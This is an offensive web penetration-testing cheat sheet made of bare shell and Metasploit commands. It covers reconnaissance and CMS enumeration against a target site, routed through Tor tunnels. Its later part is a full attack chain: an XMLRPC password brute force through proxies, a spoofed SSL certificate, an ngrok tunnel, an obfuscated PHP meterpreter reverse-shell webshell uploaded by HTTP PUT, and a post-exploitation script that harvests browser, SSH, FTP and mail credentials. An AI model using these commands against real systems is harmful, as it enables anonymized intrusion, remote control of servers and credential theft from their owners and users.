App Platform Configuration

Check List

Cheat Sheet

Sample and Known Files and Directories

20 Tor Tunnel

multitor --init 20 --user debian-tor --socks-port 9000 --control-port 9900 --proxy privoxy

Scan Web Server

nikto -h $WEBSITE

Subdomain Fuzzing

subfinder -all -silent -d $WEBSITE -o /tmp/subfinder.txt

Check HTTP Liveness

cat /tmp/subfinder.txt | httpx -silent -sc -probe -title -td -ip -t 90 -mc 200,404,403,302,301,303,304,305,306,307,302 -o /tmp/subdomains.txt

Directory Fuzzing

dirsearch -l /tmp/subdomains.txt -t 150 -x 403,404,500,429 -i 200,301,302 --random-agent 

List all Tags

nuclei -tgl

Scan OSINT & Recon

nuclei -u $WEBSITE -tags osint enum recon

Scan CVEs & Vulnerabilities

nuclei -u $WEBSITE -tags cves detect vulnerabilities

Scan CVEs with Multitor

nuclei -u $WEBSITE -tags cves detect vulnerabilities -proxy socks4://127.0.0.1:16379

Scan Misconfigurations & Panels

nuclei -u $WEBSITE -tags exposure misconfig disclosure tech panel

XSS & SQLi & LFI & RCE & SSRF

nuclei -u $WEBSITE -tags xss lfi sqli ssrf traversal fileupload rce unauth deserialization

Scan General

wpscan --url $WEBSITE --rua --api-token $TOKEN

Scan with Multitor

wpscan --url $WEBSITE --rua --api-token $TOKEN --proxy socks4://127.0.0.1:16379

Enum Users

wpscan --url $WEBSITE --rua --api-token $TOKEN -e u, m

Enum Plugins

wpscan --url $WEBSITE --rua --api-token $TOKEN -e ap, vp, p

Enum Themes

wpscan --url $WEBSITE --rua --api-token $TOKEN -e at, vt, t

Enum Config Backups

wpscan --url $WEBSITE --rua --api-token $TOKEN -e cb, dbe, tt

Scan General

joomscan -u $WEBSITE --random-agent

Scan with Multitor

joomscan -u $WEBSITE --random-agent --proxy socks4://127.0.0.1:16379

Enum Endpoints

joomscan -u $WEBSITE --random-agent -ec

Scan General

droopescan scan drupal -u $WEBSITE

Enum Endpoints

droopescan scan drupal -u $WEBSITE --enumerate a

Scan General

drupwn --mode exploit --target $WEBSITE

Enum Endpoints

drupwn --mode enum --modules --target $WEBSITE

Enum Users

drupwn --mode enum --users --target $WEBSITE

Scan SharePoint

spartan -u $WEBSITE --sps --users -s

Scan & Enum IIS

iis_shortname_scanner 2 20 $WEBSITE

Comment Review

HTML Sources

katana -u $WEBSITE 

JS Sources

katana -u $WEBSITE | grep "\.js$"

CSS Sources

katana -u $WEBSITE | grep "\.css*"

System Configuration

lynis

hardentools-cli.exe

Configuration Review

HTTP Methods

nmap -sS -sV --mtu 5000 --script http-methods $WEBSITE

PingBack XMLRPC

msfconsole -qx "use auxiliary/scanner/http/wordpress_pingback_access;set RHOSTS $WEBSITE;set RPORT 443;set SSL true;run;exit"

Brute force XMLRPC with Multitor

msfconsole -qx "use scanner/http/wordpress_xmlrpc_login;set RHOSTS $WEBSITE;set RPORT 443;set SSL true;set USERNAME admin;set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top10000.txt;set THREADS 10;set STOP_ON_SUCCESS true;set Proxies socks4:127.0.0.1:16379;run;exit"

Scan PUT Methods

msfconsole -qx "use auxiliary/scanner/http/http_put;set RHOSTS $WEBSITE;set RPORT 443;set SSL true;set PATH /wp-content/uploads;run -j"

Start Ngrok

ngrok tcp 4444 >/dev/null 2>&1 &

Define Ngrok Environment Variables

NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*;msfconsole -qx "use auxiliary/gather/impersonate_ssl;set RHOSTS google.com;run;exit"

Define Cert Environment Variable

CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

Post-Exploitation

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
bg
EOF

Generate Webshell

msfvenom -p php/meterpreter/reverse_tcp LHOST=$NGHOST PORT=$NGPORT HandlerSSLCert=/root/.msf4/loot/$CERT StagerVerifySSLCert=true PayloadUUIDTracking=true PayloadUUIDName=StagedPHP EnableStageEncoding=true -f raw -e php/base64 -i 3 -o /tmp/unk9vvn.php;sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php;sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php

Metasploit Listener

msfconsole -qx "use multi/handler;set PAYLOAD php/meterpreter/reverse_tcp;set LHOST $NGHOST;set LPORT $NGPORT;set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 4444;set HandlerSSLCert $CERT;set StagerVerifySSLCert true;set StageEncoder true;set AutoRunScript /tmp/post-exp.rc;run -j"

Upload Shell PUT Method

curl -v $WEBSITE/wp-content/uploads --upload-file /tmp/unk9vvn.php

Logging

Commix

Code Injection

commix -u $WEBSITE
